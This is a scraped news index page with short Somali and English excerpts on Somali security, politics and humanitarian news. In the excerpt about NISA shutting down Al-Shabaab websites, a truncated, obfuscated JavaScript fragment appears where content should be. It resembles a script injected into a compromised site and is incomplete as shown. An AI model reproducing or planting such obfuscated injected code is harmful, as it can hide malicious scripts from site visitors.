Sarkaal ka tirsan Al-Shabaab oo isku soo dhiibay ciidamada dowladda Soomaaliya
BAYDHABO (SMN) - Maxamed Ibraahim oo magaca afgarashada loo yaqaano (Najiib) oo ka tirsanaa Al-Shabaab ayaa isku soo dhiibey Taliska Guutada 8-aad Ciidanka Xoogga Dalka, gaar ahaan Qeybta 60-aad.
Maxamed Najiib oo muddo 3 sano ah Al-Shabaab u qaabilsanaa Jabhada , ayaa ka qayb qaatey dagaallo dhowr ah oo ka dhacay Laamu iyo Mandheera ee Dalka Kenya .
Maxamed Ibraahim ayaa...
Taliska Booliska Soomaaliya oo war cusub kasoo saaray dhulka dab damiska
MUQDISHO (SMN) - Taliska ciidanka Booliska Soomaaliya ayaa markale ku celiyey in kama danbees Arbacada soo socoto lagaga guuro Dhulkii Dab-damiska iyo Hoggaanka Dhismaha Booliska oo ku yaal gobolka Banaadir gaar ahaan ka soo horjeeda daarta Say-Biyaano.
Afhayeenka ciidanka Booliska oo la hadlay warbaahinta ayaa sheegay in taliska iyo guddi ay soo dirsadeen dadka deegaanka ay ku heshiiyeen in lasiiyo...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 34 qodob
MUQDISHO (SMN) - Dowladda Soomaaliya oo soo saartay warbixinteeda todobaadlaha ah ayaa uga hadashay xaaladda dalka, taas oo ka kooban 34 qodob oo lagu soo koobay dhacdooyinka todobaadka.
Hoos ka akhriso:-
1- Madaxweynaha Jamhuuiryadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo dalka Isutagga Imaaraadka Carabta kaga qeybgaley shir caalami ah oo looga hadlayey amniga iyo la dagaalanka argagixisada Soomaaliya.
2- Madaxweyne Dr...
Somalia Bans Single-Use Plastic Bags to Protect the Environment
MOGADISHU, Somalia --- In a landmark move to combat plastic pollution and protect the environment, the Federal Government of Somalia has taken a bold step by announcing a comprehensive ban on single-use plastic bags nationwide.
This significant milestone was initiated with the issuance of a Ministerial Decree today by Ambassador Khadija Mohamed Al-Makhzoumi, who serves as the Minister of Environment...
Ethiopian forces exit key base in central Somalia amid Al-Shabaab war
BELEDWEYNE, Somalia - The Ethiopian troops in Somalia started military maneuvers in the central region of Hiran amid a rift between the two countries over a maritime MoU.
The residents in Halgan, a small town in Hiran reported that Ethiopian troops began to pull out from a key military base where Al-Shabaab has attacked several times in the past.
The situation...
UN, Somalia launch $1.6 Billion appeal for humanitarian aid
MOGADISHU, SOMALIA — The United Nations and the Somali government have launched a $1.6 billion appeal to address humanitarian challenges in Somalia. The 2024 Humanitarian Needs Action Plan seeks to provide life-saving support to over 5 million Somalis this year.
The U.N. says climate shocks, conflict, widespread poverty and disease outbreaks continue to drive humanitarian needs in the Horn of...
Ciidamada Itoobiya oo dhaq-dhaqaaqyo ka bilaabay gobolka Hiiraan
BELEDWEYNE (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in maanta xaalad kacsanaan ah laga dareemayo deegaanka Halgan ee gobolkaasi, halkaas oo ay dhaq-dhaqaaqyo ka bilaabeen ciidamada Itoobiya ee ku sugan gobolka.
Ilo dadka deegaanka ayaa innoo sheegay inay arkayaan gaadiidka ciidamada oo isaga kala goosha deegaanka, taas oo keentay in dhaq-dhaqaaqyo laga dareemo halkaasi.
Wararka ayaa sheegaya in ciidamada...
Hay’adda NISA oo xirtay bogag ay lahaayeen Al-Shabaab
MUQDISHO (SMN) - Hay'adda Sirdoonka iyo Nabad Sugidda Qaranka ee NISA ayaa shaacisay in dalka iyo dibaddiisa ay ka xirtay Website-yo ay adeegsan jireen Al-Shabaab.
Qoraal kaso baxay NISA ayaa waxaa lagu sheegay inay hay'addu heshay magacyada miilkiilayaasha diiwaan-geliyay, kadibna laga dacweeyay dalalka ay joogaan:
Liiska Website-yada la xiray ka eeg sawirka hoose:-
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...
Somali president attends a crucial UAE meeting on his country’s security
ABU DHABI, UAE - The president of Somalia Hassan Sheikh attended a vital conference on his country's security which brought together representatives from several countries.
Delegates and top officials from Qatar, the UK, the US, UAE, and Turkey were in attendance at the Abu Dhabi forum that seeks united support for Somalia in terms of security.
"The meeting focused on how to...
Farmaajo set to return to Somalia after long absence
MOGADISHU, Somalia - The former president of Somalia Mohamed Abdullahi Farmaajo is expected to return to the country on Friday.
Multiple sources confirmed Farmaajo's comeback which from Doha, Qatar where he was staying since his defeat in May 2022 presidential election.
The sources add that the aim of Farmaajo's trip is based on mediation between Villa Somalia and Puntland leader Said...












